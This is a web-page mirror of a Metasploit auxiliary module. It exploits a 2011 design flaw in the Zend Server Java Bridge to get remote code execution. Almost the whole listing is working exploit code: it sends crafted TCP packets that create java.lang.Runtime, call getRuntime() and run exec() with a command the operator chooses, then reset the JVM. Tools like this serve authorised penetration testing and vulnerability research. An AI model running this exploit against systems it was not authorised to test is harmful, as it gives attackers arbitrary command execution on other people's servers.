CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/zend/java_bridge.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Zend Server Java Bridge Design Flaw Remote Code Execution',

12
      'Description'    => %q{

13
          This module abuses a flaw in the Zend Java Bridge Component of

14
        the Zend Server Framework. By sending a specially crafted packet, an

15
        attacker may be able to execute arbitrary code.

16


17
        NOTE: This module has only been tested with the Win32 build of the software.

18
      },

19
      'Author'         => [ 'ikki', 'MC' ],

20
      'License'        => MSF_LICENSE,

21
      'References'     =>

22
        [

23
          [ 'OSVDB', '71420'],

24
          [ 'ZDI', '11-113' ],

25
          [ 'EDB', '17078' ],

26
        ],

27
      'DisclosureDate' => '2011-03-28'))

28


29
    register_options(

30
      [

31
        Opt::RPORT(10001),

32
        OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),

33
      ])

34
  end

35


36
  def run

37


38
    cmd = datastore['CMD']

39


40
    connect

41


42
    java_object =  [0x33000000].pack('V') + [0x00000000].pack('V')

43
    java_object << [0x0c000000].pack('V') + "CreateObject"

44
    java_object << [0x02000000].pack('V') + [0x00000004].pack('V')

45
    java_object << "\x11" + "java.lang.Runtime" + "\x07"

46
    java_object << [0x00000000].pack('V')

47


48
    print_status("Creating the Java Object 'java.lang.Runtime'")

49
    sock.put(java_object)

50
    res = sock.get_once() || ''

51
    classid = res[5,4]

52


53
    runtime =  [0x16000000].pack('V') + classid + [0x0a000000].pack('V')

54
    runtime << "getRuntime" + [0x00000000].pack('V')

55


56
    print_status("Invoking static method 'getRuntime()'")

57
    sock.put(runtime)

58
    res = sock.get_once() || ''

59
    methodid = res[5,4]

60


61
    exec =  [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid

62
    exec << [0x04000000].pack('V') + "exec" + [0x01000000].pack('V')

63
    exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd

64


65
    print_status("Invoking method 'exec()' with parameter '#{cmd}'")

66
    sock.put(exec)

67
    success = sock.get_once() || ''

68
    if (success =~ /\x00\x00\x00/)

69
      print_status("Cleaning up the JVM")

70
      rm =  [0x11000000].pack('V') + [0xffffffff].pack('V')

71
      rm << [0x05000000].pack('V') + "reset"

72
      rm << [0x00000000].pack('V')

73
      sock.put(rm)

74
    else

75
      print_error("Failed to run command...")

76
      disconnect

77
      return

78
    end

79


80
    disconnect

81


82
  end

83
end

84


85